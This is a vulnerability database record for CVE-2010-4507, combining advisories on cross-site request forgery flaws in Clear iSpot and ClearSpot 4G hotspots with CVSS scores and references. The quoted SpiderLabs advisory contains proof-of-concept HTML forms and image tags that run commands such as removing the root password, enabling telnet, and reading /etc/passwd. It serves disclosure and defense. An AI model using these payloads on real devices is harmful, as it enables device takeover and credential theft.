ID

VAR-201012-0295


CVE

CVE-2010-4507


TITLE

Cross-site request forgery vulnerability in administrator authentication on iSpot and ClearSpot

Trust: 0.8

sources: JVNDB: JVNDB-2010-003488

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that:

(1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi,
(2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi,
(3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi,
(4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or
(5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi.

Clear iSpot and Clearspot are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

The following versions are affected:

iSpot 2.0.0.0 (R1679)
Clearspot 2.0.0.0 (R1512) and 2.0.0.0 (R1786)

----------------------------------------------------------------------

TITLE: Clear iSpot and Clear Clearspot Cross-Site Request Forgery Vulnerability

SECUNIA ADVISORY ID: SA42590

VERIFY ADVISORY: http://secunia.com/advisories/42590/

RELEASE DATE: 2010-12-26

DESCRIPTION: A vulnerability has been reported in Clear iSpot and Clear Clearspot, which can be exploited by malicious people to conduct cross-site request forgery attacks. The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. remove the root password or enable telnet by tricking a logged-in administrator into visiting a malicious web site. The vulnerabilities are reported in Clear iSpot version 2.0.0.0, firmware version 1.9.9.4 and Clear Clearspot version 2.0.0.0, firmware version 1.9.9.4.

SOLUTION: Do not browse untrusted web sites or follow untrusted links while being logged-in to the application.

PROVIDED AND/OR DISCOVERED BY: Matthew Jakubowski, Trustwave's SpiderLabs

ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

----------------------------------------------------------------------
Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10
Version: 1.0

Vendor: Clear (http://www.clear.com)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)

Versions affected: The observed behavior is the result of a design choice, and may be present on multiple versions.

iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
                    2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version : 1.9.9.4
Hardware Version : R051.2
Device Name : IMW-C615W
Device Manufacturer : INFOMARK (http://infomark.co.kr)

Product Description: iSpot and ClearSpot 4G are portable 4G devices that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection.

Credit: Matthew Jakubowski of Trustwave's SpiderLabs

CVE: CVE-2010-4507

Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information.
Add new user:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
      <input type="hidden" name="act" value="act_cmd_result">
      <input type="hidden" name="cmd" value="adduser -S jaku">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku'>

Remove root password:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
      <input type="hidden" name="act" value="act_cmd_result">
      <input type="hidden" name="cmd" value="passwd -d root">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root'>

Enable remote administration access:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
      <input type="hidden" name="act" value="act_network_set">
      <input type="hidden" name="enable_remote_access" value="YES">
      <input type="hidden" name="remote_access_port" value="80">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80'>

Enable telnet if not already enabled:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
      <input type="hidden" name="act" value="act_set_wimax_etc_config">
      <input type="hidden" name="ENABLE_TELNET" value="YES">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES'>

Allow remote telnet access:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
      <input type="hidden" name="act" value="act_network_set">
      <input type="hidden" name="add_enable" value="YES">
      <input type="hidden" name="add_host_ip" value="1">
      <input type="hidden" name="add_port" value="23">
      <input type="hidden" name="add_protocol" value="BOTH">
      <input type="hidden" name="add_memo" value="admintelnet">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>

Once compromised, it is possible to download any file from the devices using the following method.

Download /etc/passwd file:

    <form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi">
      <input type="hidden" name="act" value="act_file_download">
      <input type="hidden" name="METHOD" value="PATH">
      <input type="hidden" name="FILE_PATH" value="/etc/passwd">
      <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd'>

Vendor Response: No official response is available at the time of release.

Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.

Vendor Communication Timeline:

8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.

Revision History:

1.0 Initial publication

Trust: 2.16

sources: NVD: CVE-2010-4507 // JVNDB: JVNDB-2010-003488 // BID: 45373 // VULHUB: VHN-47112 // PACKETSTORM: 97035 // PACKETSTORM: 96629

AFFECTED PRODUCTS

vendor: clear | model: clearspot | scope: eq | version: 1.9.9.4

Trust: 2.4

vendor: clear | model: ispot | scope: eq | version: 1.9.9.4

Trust: 2.4

vendor: clear | model: clearspot | scope: eq | version: 2.0.0.0

Trust: 1.6

vendor: clear | model: ispot | scope: eq | version: 2.0.0.0

Trust: 1.3

vendor: clear | model: clearspot | scope: eq | version: 2.0.0.0 r1512 and r1786

Trust: 0.8

vendor: clear | model: ispot | scope: eq | version: 2.0.0.0 r1679

Trust: 0.8

sources: BID: 45373 // JVNDB: JVNDB-2010-003488 // CNNVD: CNNVD-201012-370 // NVD: CVE-2010-4507

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2010-4507
value: HIGH

Trust: 1.0

NVD: CVE-2010-4507
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201012-370
value: CRITICAL

Trust: 0.6

VULHUB: VHN-47112
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2010-4507
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-47112
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-47112 // JVNDB: JVNDB-2010-003488 // CNNVD: CNNVD-201012-370 // NVD: CVE-2010-4507

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-47112 // JVNDB: JVNDB-2010-003488 // NVD: CVE-2010-4507

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201012-370

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201012-370

CONFIGURATIONS

sources: JVNDB: JVNDB-2010-003488

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-47112

PATCH

title: Clear Spot | url: http://www.clear.com/devices/spot

Trust: 0.8

sources: JVNDB: JVNDB-2010-003488

EXTERNAL IDS

db: NVD | id: CVE-2010-4507

Trust: 2.9

db: EXPLOIT-DB | id: 15728

Trust: 1.7

db: SECUNIA | id: 42590

Trust: 1.2

db: JVNDB | id: JVNDB-2010-003488

Trust: 0.8

db: CNNVD | id: CNNVD-201012-370

Trust: 0.7

db: BID | id: 45373

Trust: 0.4

db: PACKETSTORM | id: 96629

Trust: 0.2

db: SEEBUG | id: SSVID-70383

Trust: 0.1

db: VULHUB | id: VHN-47112

Trust: 0.1

db: PACKETSTORM | id: 97035

Trust: 0.1

sources: VULHUB: VHN-47112 // BID: 45373 // JVNDB: JVNDB-2010-003488 // PACKETSTORM: 97035 // PACKETSTORM: 96629 // CNNVD: CNNVD-201012-370 // NVD: CVE-2010-4507

REFERENCES

url:https://www.trustwave.com/spiderlabs/advisories/twsl2010-008.txt

Trust: 2.2

url:http://www.exploit-db.com/exploits/15728/

Trust: 1.7

url:http://secunia.com/advisories/42590

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4507

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-4507

Trust: 0.8

url:http://www.clear.com/devices

Trust: 0.3

url:/archive/1/515178

Trust: 0.3

url:http://secunia.com/products/corporate/evm/

Trust: 0.1

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

Trust: 0.1

url:http://secunia.com/advisories/42590/#comments

Trust: 0.1

url:http://secunia.com/products/corporate/vim/

Trust: 0.1

url:http://secunia.com/advisories/42590/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/personal/

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=42590

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.1

url:http://secunia.com/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2010-4507

Trust: 0.1

url:http://www.clear.com

Trust: 0.1

url:http://lists.grok.org.uk/full-disclosure-charter.html

Trust: 0.1

url:https://www.trustwave.com

Trust: 0.1

url:http://infomark.co.kr

Trust: 0.1

url:https://www.trustwave.com/spiderlabs

Trust: 0.1

url:http://192.168.1.1/cgi-bin/upgrademain.cgi

Trust: 0.1

sources: VULHUB: VHN-47112 // BID: 45373 // JVNDB: JVNDB-2010-003488 // PACKETSTORM: 97035 // PACKETSTORM: 96629 // CNNVD: CNNVD-201012-370 // NVD: CVE-2010-4507

CREDITS

Matthew Jakubowski

Trust: 0.3

sources: BID: 45373

SOURCES

db: VULHUB | id: VHN-47112
db: BID | id: 45373
db: JVNDB | id: JVNDB-2010-003488
db: PACKETSTORM | id: 97035
db: PACKETSTORM | id: 96629
db: CNNVD | id: CNNVD-201012-370
db: NVD | id: CVE-2010-4507

LAST UPDATE DATE

2025-04-11T23:19:04.480000+00:00


SOURCES UPDATE DATE

db: VULHUB | id: VHN-47112 | date: 2011-01-12T00:00:00
db: BID | id: 45373 | date: 2011-05-09T14:52:00
db: JVNDB | id: JVNDB-2010-003488 | date: 2012-03-27T00:00:00
db: CNNVD | id: CNNVD-201012-370 | date: 2011-01-10T00:00:00
db: NVD | id: CVE-2010-4507 | date: 2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db: VULHUB | id: VHN-47112 | date: 2010-12-30T00:00:00
db: BID | id: 45373 | date: 2010-12-10T00:00:00
db: JVNDB | id: JVNDB-2010-003488 | date: 2012-03-27T00:00:00
db: PACKETSTORM | id: 97035 | date: 2010-12-26T07:30:32
db: PACKETSTORM | id: 96629 | date: 2010-12-11T16:29:50
db: CNNVD | id: CNNVD-201012-370 | date: 2010-12-31T00:00:00
db: NVD | id: CVE-2010-4507 | date: 2010-12-30T19:00:05.457